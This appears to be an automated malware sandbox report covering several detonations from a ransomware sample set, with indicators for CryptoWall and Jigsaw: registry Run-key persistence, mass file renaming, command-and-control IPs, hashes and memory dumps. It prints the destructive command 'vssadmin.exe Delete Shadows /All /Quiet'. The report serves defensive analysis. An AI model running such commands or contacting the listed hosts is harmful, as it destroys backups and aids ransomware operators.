| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral22
Detonation Overview
Submitted
2024-11-28 22:32
Reported
2024-11-28 22:35
Platform
win10v2004-20241007-en
Max time kernel
93s
Max time network
137s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Ransomware-master\etc\load.sh
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral27
Detonation Overview
Submitted
2024-11-28 22:32
Reported
2024-11-28 22:35
Platform
win7-20240903-en
Max time kernel
119s
Max time network
120s
Command Line
Signatures
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1920 wrote to memory of 108 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 1920 wrote to memory of 108 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 1920 wrote to memory of 108 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 108 wrote to memory of 2784 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 108 wrote to memory of 2784 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 108 wrote to memory of 2784 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 108 wrote to memory of 2784 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Ransomware-master\warna.py
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\Ransomware-master\warna.py
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Ransomware-master\warna.py"
Network
Files
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
| MD5 | f66cd03d77192307267b68ba42da048e |
| SHA1 | ec4331eb82e16e8ba602180e73c2363fad393da5 |
| SHA256 | f84519f3b4f5359447963a94cf30e9d08b73fac5815adaef253ca0e61047301c |
| SHA512 | d55c4cfb630ac0f6bcd1613bd4e1d6cbf4cc54e6348f4cb57819312973127eaf0701758fef3cc3492839f41d0031e5a4123e26e68ac42c247dfc7e2e0d2a24b0 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-28 22:32
Reported
2024-11-28 22:35
Platform
win7-20240903-en
Max time kernel
131s
Max time network
141s
Command Line
Signatures
Deletes shadow copies
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8b7a4d25.exe | C:\Windows\syswow64\explorer.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\8b7a4d2 = "C:\\8b7a4d25\\8b7a4d25.exe" | C:\Windows\syswow64\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\*b7a4d2 = "C:\\8b7a4d25\\8b7a4d25.exe" | C:\Windows\syswow64\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\8b7a4d25 = "C:\\Users\\Admin\\AppData\\Roaming\\8b7a4d25.exe" | C:\Windows\syswow64\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\*b7a4d25 = "C:\\Users\\Admin\\AppData\\Roaming\\8b7a4d25.exe" | C:\Windows\syswow64\explorer.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-addr.es | N/A | N/A |
| N/A | myexternalip.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2404 set thread context of 2444 | N/A | C:\Users\Admin\AppData\Local\Temp\cryptowall.exe | C:\Users\Admin\AppData\Local\Temp\cryptowall.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\vssadmin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\cryptowall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\cryptowall.exe | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\vssadmin.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cryptowall.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cryptowall.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cryptowall.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\explorer.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: 33 | N/A | C:\Users\Admin\AppData\Local\Temp\cryptowall.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\cryptowall.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\cryptowall.exe
"C:\Users\Admin\AppData\Local\Temp\cryptowall.exe"
C:\Users\Admin\AppData\Local\Temp\cryptowall.exe
"C:\Users\Admin\AppData\Local\Temp\cryptowall.exe"
C:\Windows\syswow64\explorer.exe
"C:\Windows\syswow64\explorer.exe"
C:\Windows\syswow64\svchost.exe
-k netsvcs
C:\Windows\syswow64\vssadmin.exe
vssadmin.exe Delete Shadows /All /Quiet
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-addr.es | udp |
| FR | 188.165.164.184:80 | ip-addr.es | tcp |
| US | 8.8.8.8:53 | myexternalip.com | udp |
| US | 34.160.111.145:80 | myexternalip.com | tcp |
| FR | 94.247.31.19:8080 | tcp | |
| US | 209.148.85.151:8080 | tcp | |
| FR | 91.121.12.127:4141 | tcp | |
| FR | 94.247.28.26:2525 | tcp | |
| FR | 94.247.28.156:8081 | tcp | |
| FR | 188.165.164.184:80 | ip-addr.es | tcp |
| US | 34.160.111.145:80 | myexternalip.com | tcp |
| FR | 94.247.31.19:8080 | tcp | |
| US | 209.148.85.151:8080 | tcp |
Files
memory/2444-13-0x0000000000400000-0x0000000000425000-memory.dmp
memory/2444-11-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2404-10-0x0000000000230000-0x0000000000246000-memory.dmp
memory/2884-15-0x0000000000080000-0x00000000000A5000-memory.dmp
memory/2444-14-0x0000000000400000-0x0000000000425000-memory.dmp
memory/2444-9-0x0000000000400000-0x0000000000425000-memory.dmp
memory/2444-7-0x0000000000400000-0x0000000000425000-memory.dmp
memory/2444-4-0x0000000000400000-0x0000000000425000-memory.dmp
memory/2444-0-0x0000000000400000-0x0000000000425000-memory.dmp
memory/2444-2-0x0000000000400000-0x0000000000425000-memory.dmp
memory/2772-21-0x0000000000080000-0x00000000000A5000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-11-28 22:32
Reported
2024-11-28 22:35
Platform
win7-20240903-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Jigsaw Ransomware
Jigsaw family
Renames multiple (2029) files with added filename extension
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Local\Temp\jigsaw.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-favorites_ja.jar.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvmstat_zh_CN.jar.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\setting_back.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\button_right_over.gif.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-applemenu_ja.jar.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-autoupdate-ui.jar.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-options.xml | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-utilities.jar.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-impl_zh_CN.jar | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-options_ja.jar.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files\RegisterHide.avi.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\ja-JP\gadget.xml | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\Gadget_Main_Gradient.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.forms_3.6.100.v20140422-1825.jar.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\XmlFile.zip.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-windows.xml | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationRight_ButtonGraphic.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\106.0.5249.119\VisualElements\LogoBeta.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp_5.5.0.165303.jar.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Module.zip | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.Office.Interop.InfoPath.Xml.xml.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Grayscale.xml | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsIncomingImageMask.bmp | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-threaddump_ja.jar | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\oracle.gif.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-join.avi | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\fr-FR\js\timeZones.js | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\de-DE\js\slideShow.js | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.webapp.nl_zh_4.4.0.v20140623020002.jar | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\de-DE\js\library.js | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ar.txt | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files\7-Zip\Lang\nb.txt.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\fr-FR\gadget.xml | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-host-remote.jar | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Postage_VideoInset.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\trad_s.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench_1.2.1.v20140901-1244.jar.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\help.gif.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationUp_SelectionSubpicture.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\glass_lrg.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\feedbck2.gif | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.ecore.xmi_2.10.1.v20140901-1043.jar.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\es-ES\js\service.js | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\it-IT\js\localizedStrings.js | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsViewAttachmentIcons.jpg | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_center.gif | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Templates\1033\BlackTieResume.dotx | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyrun.jar.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt.nl_ja_4.4.0.v20140623020002.jar.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\de-DE\gadget.xml | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation.nl_ja_4.4.0.v20140623020002.jar | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring_ja.jar | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\es-ES\js\init.js | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-startup.xml | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-masterfs-nio2.xml.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-core.xml.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-oql.xml | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench.nl_zh_4.4.0.v20140623020002.jar.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.app_1.3.200.v20130910-1609.jar.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\RedistList\FrameworkList.xml.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\js\picturePuzzle.js | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierDisableUpArrow.jpg | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\add_down.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.natives.nl_ja_4.4.0.v20140623020002.jar | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2976 wrote to memory of 1632 | N/A | C:\Users\Admin\AppData\Local\Temp\jigsaw.exe | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe |
| PID 2976 wrote to memory of 1632 | N/A | C:\Users\Admin\AppData\Local\Temp\jigsaw.exe | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe |
| PID 2976 wrote to memory of 1632 | N/A | C:\Users\Admin\AppData\Local\Temp\jigsaw.exe | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\jigsaw.exe
"C:\Users\Admin\AppData\Local\Temp\jigsaw.exe"
C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe
"C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe" C:\Users\Admin\AppData\Local\Temp\jigsaw.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | btc.blockr.io | udp |
Files
memory/2976-0-0x000007FEF5FDE000-0x000007FEF5FDF000-memory.dmp
memory/2976-1-0x0000000000270000-0x00000000002A8000-memory.dmp
memory/2976-2-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp
memory/2976-3-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp
C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe
| MD5 | 2773e3dc59472296cb0024ba7715a64e |
| SHA1 | 27d99fbca067f478bb91cdbcb92f13a828b00859 |
| SHA256 | 3ae96f73d805e1d3995253db4d910300d8442ea603737a1428b613061e7f61e7 |
| SHA512 | 6ef530b209f8ec459cca66dbf2c31ec96c5f7d609f17fa3b877d276968032fbc6132ea4a45ed1450fb6c5d730a7c9349bf4481e28befaea6b119ec0ded842262 |
memory/1632-11-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp
memory/2976-10-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp
memory/1632-12-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp
memory/1632-13-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp
C:\Users\Admin\Documents\SelectTrace.xlsx.fun
| MD5 | 394e48e09c021dbb9d0d4c602fe282c0 |
| SHA1 | 53f68b45f971cc6eebe8d55b0de646c160fca976 |
| SHA256 | 924cb4f85f15f2f271d99120031bd24e0166109b94a2d02731e7858dc884d7af |
| SHA512 | 8ead2dfaa1ba5aeb46cf746690fb169be733cc873a3c041bb2291c4699ae58ce4c9dfb1a4aba93ff5f417ad8517fa5294541c54d8776dbd592d6aef5168f9c79 |
C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\invalid32x32.gif.fun
| MD5 | 580ee0344b7da2786da6a433a1e84893 |
| SHA1 | 60f8c4dd5457e9834f5402cb326b1a2d3ca0ba7e |
| SHA256 | 98b6c2ddfefc628d03ceaef9d69688674a6bc32eb707f9ed86bc8c75675c4513 |
| SHA512 | 356d2cdea3321e894b5b46ad1ea24c0e3c8be8e3c454b5bd300b7340cbb454e71fc89ca09ea0785b373b483e67c2f6f6bb408e489b0de4ff82d5ed69a75613ba |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\DNTException\container.dat.fun
| MD5 | 8ebcc5ca5ac09a09376801ecdd6f3792 |
| SHA1 | 81187142b138e0245d5d0bc511f7c46c30df3e14 |
| SHA256 | 619e246fc0ac11320ff9e322a979948d949494b0c18217f4d794e1b398818880 |
| SHA512 | cec50bfc6ad2f57f16da99459f40f2d424c6d5691685fa1053284f46c8c8c8a975d7bcb1f3521c4f3fbdc310cf4714e29404aa23be6021e2e267c97b090dc650 |
memory/1632-2052-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp
memory/1632-2053-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp
memory/1632-2055-0x000007FEF5D20000-0x000007FEF66BD000-memory.dmp
memory/1632-2056-0x000000001C150000-0x000000001C1C2000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2024-11-28 22:32
Reported
2024-11-28 22:35
Platform
win10v2004-20241007-en
Max time kernel
94s
Max time network
138s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\131.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\131.exe
"C:\Users\Admin\AppData\Local\Temp\131.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.208.201.84.in-addr.arpa | udp |
